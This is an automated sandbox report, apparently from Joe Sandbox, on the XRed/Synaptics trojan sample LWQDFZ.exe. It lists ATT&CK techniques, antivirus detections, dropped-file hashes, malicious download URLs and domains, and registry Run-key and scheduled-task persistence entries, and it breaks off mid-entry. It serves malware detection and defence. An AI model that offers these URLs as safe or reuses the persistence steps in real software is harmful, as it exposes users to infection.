                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_003F91DC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_003F96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_006C91DC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_006C96E2
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 421 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 421 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                              Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Extra Window Memory Injection | 21 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 38 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 1 Extra Window Memory Injection | Cached Domain Credentials | 261 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 12 Masquerading | DCSync | 131 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 2 Valid Accounts | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 131 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                              Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                              [Behavior graph] Behavior Graph ID: 1582337, Sample: LWQDFZ.exe, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100

                              Source | Detection | Scanner | Label | Link
                              LWQDFZ.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
                              LWQDFZ.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              LWQDFZ.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              LWQDFZ.exe | 100% | Joe Sandbox ML | |

                              Source | Detection | Scanner | Label | Link
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\ProgramData\Synaptics\RCXFBD9.tmp | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\ProgramData\Synaptics\RCXFBD9.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                              C:\Users\user\AppData\Local\Temp\MHDFGY.vbs | 100% | Avira | VBS/Runner.VPJI |
                              C:\Users\user\Desktop\._cache_LWQDFZ.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\AppData\Roaming\Windata\KQNALS.exe | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\RCXFBD9.tmp | 100% | Joe Sandbox ML | |
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1 | 100% | Joe Sandbox ML | |
                              C:\ProgramData\Synaptics\RCXFBD9.tmp | 100% | ReversingLabs | Win32.Worm.Zorex |
                              C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
                              C:\Users\user\AppData\Roaming\Windata\KQNALS.exe | 53% | ReversingLabs | Win32.Trojan.Lisk |
                              C:\Users\user\Desktop\._cache_LWQDFZ.exe | 53% | ReversingLabs | Win32.Trojan.Lisk |
                              C:\Users\user\Documents\AIXACVYBSB\~$cache1 | 100% | ReversingLabs | Win32.Worm.Zorex |

                              No Antivirus matches
                              No Antivirus matches

                              Source | Detection | Scanner | Label | Link
                              http://xred.site50.net/syn/Synaptics.rarh | 100% | Avira URL Cloud | malware |
                              http://xred.site50.net/syn/SSLLibrary.dlD | 100% | Avira URL Cloud | malware |

                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              freedns.afraid.org | 69.42.215.252 | true | false | | high
                              docs.google.com | 142.250.185.78 | true | false | | high
                              s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
                              drive.usercontent.google.com | 142.250.186.97 | true | false | | high
                              xred.mooo.com | unknown | unknown | false | | high

                              Name | Malicious | Antivirus Detection | Reputation
                              xred.mooo.com | false | | high
                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
                                            NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.78 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
142.250.186.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582337
Start date and time: 2024-12-30 11:24:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LWQDFZ.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@22/80@11/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 66.7%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 99%
                                                                                                • Number of executed functions: 89
                                                                                                • Number of non-executed functions: 290
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 20.42.65.90, 20.42.65.92, 20.42.73.29, 20.189.173.21, 40.126.32.76, 4.175.87.197, 23.206.229.209, 13.107.253.45
                                                                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdeus14.eastus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com,
                                                                                                • Execution Graph export aborted for target Synaptics.exe, PID 7464 because there are no executed function
                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • VT rate limit hit for: LWQDFZ.exe
Time | Type | Description
05:25:22 | API Interceptor | 469x Sleep call for process: Synaptics.exe modified
05:26:30 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
10:25:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MHDFGY "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
10:25:15 | Task Scheduler | Run new task: MHDFGY.exe path: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
10:25:24 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
10:25:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MHDFGY "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
10:25:42 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                    • 69.42.215.252
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    No context
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):118
                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                    Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133654487022306
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:88SVpsUIm00NVEHYDzJDzqjLOA/1czxwzuiFJ9Z24IO8EKDzy:WyUVNVEHYJqjUKzuiFJ9Y4IO8zy
                                                                                                                    MD5:EAC608AB36B4FD16DF65CE56CB1FFAC3
                                                                                                                    SHA1:4DBE1BD7F13BA49DC977801FB34FF010E2D6B91D
                                                                                                                    SHA-256:6F64608D7A352B3F5F4040974FAE95FFF54C54D20D2EBCD0C6EAAC442E0F3554
                                                                                                                    SHA-512:67CB980514BB485E9A24F822EB32DB81C905790FB40F58E59D0C0C922B727BCB2A3D432F7B93C351DA6C51841B935690A4791E256078565DBD6054FC26979060
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133427304398768
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:n5WSVpsrImL0jMNtDzJDzqjLOA/1czxwzuiFJ9Z24IO8EKDzy:PyryjMNtJqjUKzuiFJ9Y4IO8zy
                                                                                                                    MD5:A09E313D55A86A3320E3D8BAB9EEAB45
                                                                                                                    SHA1:E7953E82EC047B9CCF4BBDCEA7957A7AD5A76578
                                                                                                                    SHA-256:7AC197136C3A6F90B64E76C8CA6ABB7D0F6EF3430D68D61236C0D0CE4010688C
                                                                                                                    SHA-512:C4AFC1652B43EA86C47D2754D86EAEB8FFCE6322F5478E59323580D48AD2CB546D01CF6720BA8EF82C88FE6CA7EC20DB9008EDFBFBF417E64F6F0509B45963BE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6318
                                                                                                                    Entropy (8bit):3.7193997233515925
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJ0xp6u8YiS6xbprG89bxfsf77m:R6lXJ26u8YCxJxEfG
                                                                                                                    MD5:ACAD88DDC12F162A005F9F85F3B06C67
                                                                                                                    SHA1:06134C7CB21106D7917AB23B89DE832B21D6C5D4
                                                                                                                    SHA-256:F6DEE967D08F8706B3762BBBA37D26C0B7818379FAC8B05E42C081125F04D39F
                                                                                                                    SHA-512:F555EDE16962AF1100670D039A29DCA88F5A5852318B141FEC7E59EC4ABA506665C64AB171CD002998BDCBADDD66220ACEBAED7A9DB5EE90A32E96B8815496FA
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.443731862570026
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs4EJg77aI9OJWpW8VYsYm8M4JFmFI+q84HJZydd:uIjfhI7c47VgJZVJZydd
                                                                                                                    MD5:3CC730776AA7F3D5444FA457E1E2396D
                                                                                                                    SHA1:63900B4DA120865FDFA7355BB05B324F5997F1F9
                                                                                                                    SHA-256:B6249B365753CC3B86CC20FF29E6E7F1E2DD775EE41677DEB29DF1D08BCFFF81
                                                                                                                    SHA-512:33CB77D2C083A07C48841B24F861F7A99A2970EEDD1EE5BA2C7A8ABCF3F005549A36F8A340CA947975C1420A90A398BF8FA172EEA8B04059B8F60D738C6571AB
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653849" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:26:38 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6206534
                                                                                                                    Entropy (8bit):2.030341953035143
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:pbvAteNQush69BahbXHoEdC5xCgY8V2QGKLACs2TvqaM/c6EAzdVpkrIBS:pb4tgwdF0oynS/Wd
                                                                                                                    MD5:037233FC1B8924BCE83AEC0CEDD4F22A
                                                                                                                    SHA1:D858D1E184FD3015DDBBD810ED917CA734173414
                                                                                                                    SHA-256:D6D17E764B51BA4441348DD3E4C7510FCDCD667BC8426BC3EFE3814D50483620
                                                                                                                    SHA-512:B88647098EAD747035F7185E93DC0DBFE9430D28E365777686E525FF2B82590ABD85229C7194D17218C1B5B556B2C62B1556CC99EF42E45499C517AE88F1253F
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6306
                                                                                                                    Entropy (8bit):3.718036114267642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RSIU6o7wVetb0xjV687fYiSjR8sU5aMQUu89bPdfsfs9Fm:R6l7wVeJ0xjV6iYiSjOpDu89bFfsfs3m
                                                                                                                    MD5:DBE285BB8486002FB095B092935E9C63
                                                                                                                    SHA1:8CA2B75A705E06F7F9A9F1472FBA2BD00E8303CF
                                                                                                                    SHA-256:1204D2225BADCF0C543E0AD8710C4B367BD1E547DEE2F3A6E3789481A70D1FD6
                                                                                                                    SHA-512:51BEE6240A1F5B543495111EBDAEDC49C089C2F2BC856ACF7680A50564D36C6E01694A175E9891BB5BC83C417648513B28D27747ABDD36B468615792E7759722
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.444370703025569
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs4EJg77aI9OJWpW8VYOcYm8M4JFTF/+q84iJZydd:uIjfhI7c47Vb5JX0JZydd
                                                                                                                    MD5:0C613B480ADF175DA3667E8249825FC5
                                                                                                                    SHA1:F485A76D5952F5EAADF766191D0D9E67908C7E2D
                                                                                                                    SHA-256:81B9338AB3DCFBF6EE836C36D7869962A428C1182F374528D8E70A9377C0D5AE
                                                                                                                    SHA-512:03EBEB6BB27A324F566D3FF67878B79D9930D50361AE3D19F02C5CE22E1590F9062586F09D52BC5042B4D946DCAA5E845BE62C54464BFA7D05CA31BB3876CB1E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653849" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:26:18 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):5152138
                                                                                                                    Entropy (8bit):2.1478056671194277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:QevpVQush69BahbX65xCjcwYySTgLbCzw68SFMzc6kAydxpNkFwBJ:Qmp943iQet4pA
                                                                                                                    MD5:722FAF8BD4ED19058D9C2ABB1C076305
                                                                                                                    SHA1:508A81F78EAB5DAE97966DBE308919BDDA84C5DA
                                                                                                                    SHA-256:8073E1C2D14061F5EFE5BEFB6E88C576D48D681D86B84C1C404FB47ABCFD93D8
                                                                                                                    SHA-512:5C11D5B87F8A71DCC979007D03DFF4684286549CE7AF0BD0EE69A92949BC21D410337C6C15A3CD2566A20187FE5C14BA2792157D570EDD6FE4F21A1AEC009EE0
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):771584
                                                                                                                    Entropy (8bit):6.632118854531729
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                    MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                    SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                    SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXFBD9.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXFBD9.tmp, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1686528
                                                                                                                    Entropy (8bit):7.462560448742017
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:cnsHyjtk2MYC5GDchloJf5fj22pkXaxMa:cnsmtk2alhlyLZ
                                                                                                                    MD5:27BCC0D927E9F13250B1DFF9E122E9AF
                                                                                                                    SHA1:2F9F09F46FE7EE2A495247292B3F2BE0777C2873
                                                                                                                    SHA-256:71C45BE1D4E8D17AEE605F93EE991D9117572E1F79C8991BFA2F7B37B285B5F1
                                                                                                                    SHA-512:1BDF5D3BA61B8D99955B92B87377FCBEA08DB248AAE1089A9028A0613EB06C43E330BD781EDF66EC955B1042C811094207B8962E391B37FC516A4B93664C7653
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):26
                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                    Malicious:true
                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.267357970275835
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
